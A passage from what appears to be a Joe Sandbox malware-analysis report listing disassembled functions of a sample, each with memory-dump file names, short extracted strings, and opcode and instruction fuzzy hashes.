                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$0$0$@$i
                                                                              • API String ID: 0-3124195287
                                                                              • Opcode ID: 3dde4e92011d443bf38784757d3a23d30fd0a34c8901d3fb1e3484e0dd03908d
                                                                              • Instruction ID: 707be819079ef8272ef890b9932bd70e7e6ded67e111138ebfdbe863c263f1ea
                                                                              • Opcode Fuzzy Hash: 3dde4e92011d443bf38784757d3a23d30fd0a34c8901d3fb1e3484e0dd03908d
                                                                              • Instruction Fuzzy Hash: 5862D07160C3818FD718EF28C49476ABBE1AFD5304F188A2DE8DA87291D774DD49CB82
                                                                              Function 00A8164F Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                              • API String ID: 0-1123320326
                                                                              • Opcode ID: e1937dd5de9213eaeae4ab074e16847daf674b5fc563521e35f872b3f8a3b3dc
                                                                              • Instruction ID: 0d56a8e2275eb65fb422bdfdd7f9a44ca4902e53cbea6a825b3bde36478c9b88
                                                                              • Opcode Fuzzy Hash: e1937dd5de9213eaeae4ab074e16847daf674b5fc563521e35f872b3f8a3b3dc
                                                                              • Instruction Fuzzy Hash: 3BF1AD3160C3818FC719DF29C48436AFBE2ABD9304F188A6EE4D987352D734D949CB92
                                                                              Function 00C52B0A Relevance: 6.7, Strings: 4, Instructions: 1677COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: YS$"K|=$11s>$aQYK
                                                                              • API String ID: 0-2011319986
                                                                              • Opcode ID: 16cd89a487280b070640f488acf9e9e19c674d5100f35db3a04a8891480fcc25
                                                                              • Instruction ID: f7bb0c9df412133056e185ff83f17f63e2a6d851636b0625a1223d7cdbf111a6
                                                                              • Opcode Fuzzy Hash: 16cd89a487280b070640f488acf9e9e19c674d5100f35db3a04a8891480fcc25
                                                                              • Instruction Fuzzy Hash: B3B2F9F360C2009FE3046E2DEC8567ABBD9EFD4720F1A463DEAC4C7744EA7598058696
                                                                              Function 00A813A3 Relevance: 6.6, Strings: 5, Instructions: 390COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                              • API String ID: 0-3620105454
                                                                              • Opcode ID: 437d959e40e8886f74d417a3a59fe70d968c79d70c9fa588dce99b03bd390789
                                                                              • Instruction ID: 726b81002ca65ca2376d82ce31845381b84d500c3bdbf72d1134b494b9bb5cd3
                                                                              • Opcode Fuzzy Hash: 437d959e40e8886f74d417a3a59fe70d968c79d70c9fa588dce99b03bd390789
                                                                              • Instruction Fuzzy Hash: B1D1AE7160D7818FC719DF29C48426AFBE2AFD9304F08CA6EE4D987352D634D949CB52
                                                                              Function 00C56375 Relevance: 6.4, Strings: 4, Instructions: 1407COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "~]$)7Nw$C'_$h.
                                                                              • API String ID: 0-343678113
                                                                              • Opcode ID: dad5f589689a9a74cedb574913a804c9ec099d5fed77a9cc9a4c93af5d9449ce
                                                                              • Instruction ID: 9e934fc965968f07956b8860468e8eb4854d2abfe0dbdbf34b93af3e99abfa5a
                                                                              • Opcode Fuzzy Hash: dad5f589689a9a74cedb574913a804c9ec099d5fed77a9cc9a4c93af5d9449ce
                                                                              • Instruction Fuzzy Hash: F9A2E9F3A0C200AFE7086E29EC8567AB7E5EF94320F1A493DEAC5C3744EA3558458757
                                                                              Function 00AAFD10 Relevance: 5.7, Strings: 4, Instructions: 667COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: :$NA_I$m1s3$uvw
                                                                              • API String ID: 0-3973114637
                                                                              • Opcode ID: dc0d6880ec58161c312c716f99148c204b37f191fe492ce0069887365910b4d8
                                                                              • Instruction ID: 09dde306f7346c75017296b7f9dc13de41544469ad9c06259fbb3b9913210695
                                                                              • Opcode Fuzzy Hash: dc0d6880ec58161c312c716f99148c204b37f191fe492ce0069887365910b4d8
                                                                              • Instruction Fuzzy Hash: 3A32A7B0909380DFD315DF68D880A6BBBE9AB8A340F144A2DF5D58B2A2D335D905CB52
                                                                              Function 00A93BE2 Relevance: 5.4, Strings: 4, Instructions: 431COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+($;z$p$ss
                                                                              • API String ID: 0-2391135358
                                                                              • Opcode ID: 2dbe4b98bf3fd5d7aed23229c028b67f411093325b5a47ef2636281bda5d7824
                                                                              • Instruction ID: d984b7021b5b671b0f525c0bc879461da8983c5d2b56a2567af8f4fb44b7824f
                                                                              • Opcode Fuzzy Hash: 2dbe4b98bf3fd5d7aed23229c028b67f411093325b5a47ef2636281bda5d7824
                                                                              • Instruction Fuzzy Hash: D9026DB4910700DFDB60EF25D986B56BFF1FB05300F50895DE89A8B695E330A815CBA2
                                                                              Function 00AA2260 Relevance: 5.4, Strings: 4, Instructions: 383COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: a|$hu$lc$sj
                                                                              • API String ID: 0-3748788050
                                                                              • Opcode ID: a1d875891d857dd17edcd3e1fa4e508f32e8253b3de7b8932e632c0ca575696b
                                                                              • Instruction ID: 6fc8a056009b241e2e7013e84361a9e7a57f73a3cbe5a48c649f2ebedaf0f9f1
                                                                              • Opcode Fuzzy Hash: a1d875891d857dd17edcd3e1fa4e508f32e8253b3de7b8932e632c0ca575696b
                                                                              • Instruction Fuzzy Hash: 1AA17B748083418BC720DF18C891B2BB7F0FF96754F589A0CE8D99B291E339D955CBA6
                                                                              Function 00C54687 Relevance: 5.4, Strings: 3, Instructions: 1621COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7qy$|j{$qw
                                                                              • API String ID: 0-1122578392
                                                                              • Opcode ID: 7fb2c5dc86cb70558534359d16c1d17bfc7683391ad2237f848a91bc92e50291
                                                                              • Instruction ID: 9c9f353b464fa036efc34a038c19c3953196e813eff78eec8ab397bbe286294c
                                                                              • Opcode Fuzzy Hash: 7fb2c5dc86cb70558534359d16c1d17bfc7683391ad2237f848a91bc92e50291
                                                                              • Instruction Fuzzy Hash: E7B218F360C210AFE3146E2DEC8567ABBE9EF98760F1A453DEAC4C7744E63558008796
                                                                              Function 00AAD7AF Relevance: 5.2, Strings: 4, Instructions: 213COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #'$CV$KV$T>
                                                                              • API String ID: 0-95592268
                                                                              • Opcode ID: 0dc11a9f9ea3347781497e5f0d28395ef2d4d28a776d5d3d9fbd2b637fcc32ce
                                                                              • Instruction ID: f622b162fbaab3dd923ee8ca649b7790b3fac089a6f5653bac742b246a224f71
                                                                              • Opcode Fuzzy Hash: 0dc11a9f9ea3347781497e5f0d28395ef2d4d28a776d5d3d9fbd2b637fcc32ce
                                                                              • Instruction Fuzzy Hash: 9D8155B48017459BDB20DFA5D2855AFBFB1FF16300F60460CE486ABA95C334AA55CFE2
                                                                              Function 00AAAC91 Relevance: 5.1, Strings: 4, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (g6e$,{*y$4c2a$lk
                                                                              • API String ID: 0-1327526056
                                                                              • Opcode ID: cf62c8f68b1da61546436fbc0b21b49328ead47780ee929465d8dcd7a9ea2b1c
                                                                              • Instruction ID: 5d07252c0dd3d0060b975b401effb21bc470a748ab11958fa81348e3e917c321
                                                                              • Opcode Fuzzy Hash: cf62c8f68b1da61546436fbc0b21b49328ead47780ee929465d8dcd7a9ea2b1c
                                                                              • Instruction Fuzzy Hash: 8D4182B4409382CBD7209F20D900BABB7F0FF86305F54995EE5C997260EB32D945CB96
                                                                              Function 00AAC470 Relevance: 4.2, Strings: 3, Instructions: 419COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+($%*+($~/i!
                                                                              • API String ID: 0-4033100838
                                                                              • Opcode ID: d5c95260221309cd0f4e5de3b7a581e4ed7c0223d4677ac8edd48f5972fff2c7
                                                                              • Instruction ID: a3a3a536ac10b1c8779c9ba6056c6a3595e1c2f6297bc9fa7d2018efcd796d7f
                                                                              • Opcode Fuzzy Hash: d5c95260221309cd0f4e5de3b7a581e4ed7c0223d4677ac8edd48f5972fff2c7
                                                                              • Instruction Fuzzy Hash: 53E198B5909340EFE320DFA4D881B2BBBF5FB86354F44882DE58987291E735D811CB92
                                                                              Function 00A88590 Relevance: 4.1, Strings: 3, Instructions: 387COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )$)$IEND
                                                                              • API String ID: 0-588110143
                                                                              • Opcode ID: 7f76533d75984917e50c36cd762360c0b8ccbc1822cc904b518f249e35248c61
                                                                              • Instruction ID: a7d46939ead9f0dd7b7c44dce03da017d3364dcecf8120ae0902857e1f756e95
                                                                              • Opcode Fuzzy Hash: 7f76533d75984917e50c36cd762360c0b8ccbc1822cc904b518f249e35248c61
                                                                              • Instruction Fuzzy Hash: 5AE1E1B1A087029FE310EF28D88172AFBE1BF94314F54492DE59597381EB79E914CBD2
                                                                              Function 00C5E671 Relevance: 4.1, Strings: 2, Instructions: 1571COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $Uu$2y~{
                                                                              • API String ID: 0-674208736
